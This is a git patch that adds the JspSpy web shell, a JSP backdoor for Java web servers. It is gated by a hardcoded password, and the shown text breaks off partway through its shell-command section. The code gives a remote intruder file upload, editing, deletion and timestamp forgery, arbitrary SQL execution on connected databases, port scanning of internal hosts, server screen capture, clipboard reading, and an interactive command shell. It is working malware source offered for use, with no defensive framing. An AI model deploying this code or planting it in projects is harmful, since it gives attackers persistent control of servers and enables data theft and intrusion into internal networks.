From 495a2b0b480c812dca3a3a39ccdd29a3d20178d8 Mon Sep 17 00:00:00 2001 From: 0c0c0f <892850447@qq.com> Date: Fri, 24 Feb 2017 16:21:18 +0800 Subject: [PATCH] Create jspspy.jsp http://c.shellsec.com/jspspy.txt --- webshell/jspspy.jsp | 2339 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2339 insertions(+) create mode 100644 webshell/jspspy.jsp diff --git a/webshell/jspspy.jsp b/webshell/jspspy.jsp new file mode 100644 index 0000000..b47ae17 --- /dev/null +++ b/webshell/jspspy.jsp @@ -0,0 +1,2339 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* Code By Ninty +* Date 2009-12-17 +* Blog http://www.Forjj.com/ +* Yue . I Love You. +*/ +private static final String PW = "ninty"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
"); +str = str.replace("\n","
"); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
"); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
"); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
" + msg; +out.write("
"+msg+"
"); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
"+ +"

System Clipboard »

"+ +"

");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
"+ +" "+ +"

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
"+ +"

Remote Control »

"+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
"+ +"

PortScan >>

"+ +"
"+ +"

"+ +"IP : Port : Timeout (秒) : "+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
"); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
"); +} +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
"+ +"
"+ +""+ +"

DataBase Manager »

"+ +""+ +"

"+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

"+ +"
"); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
"+ +"
"+ +""+ +"

DataBase Manager »

"+ +""+ +"

"+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

"+ +"
"); +out.println("
"+ +"

Run SQL query/queries on database :

"); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

Query#0 : "+Util.htmlEncode(sql)+"

"); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
"+meta.getColumnName(i)+"
"+meta.getColumnTypeName(i)+"
"); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

affected rows : "+obj+"

"); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
"+ +"

Password: "+ +" "+ +" "+ +" "+ +"

"+ +" "+ +"Copyright © 2009 NinTy www.Forjj.com

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
"); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total "+Util.getSize(currentRoot.getTotalSpace(),'G')+"

"); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Current Directory
"+ +"
"); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
"+ +"
"+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"Del | Move | Pack
"+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+""+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
 Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
"); +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
Copyright (C) 2009 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)

"+ +"

File Content

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)

"+ +"

File Content

"+ +"

"+ +"
"+ +"
"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = f.canExecute() ? "checked=\"checked\"" : ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); +out.println("
"+ +"
"+ +"

Set File Property »

"+ +"

Current file (fullpath)

"+ +" "+ +"

Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

"+ +"

Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; +String read = request.getParameter("read"); +String write = request.getParameter("write"); +String execute = request.getParameter("execute"); +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); +if (Util.isEmpty(read)) { +file.setReadable(false); +} else { +file.setReadable(true); +} +if (Util.isEmpty(write)) { +file.setWritable(false); +} else { +file.setWritable(true); +} +if (Util.isEmpty(execute)) { +file.setExecutable(false); +} else { +file.setExecutable(true); +} +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws 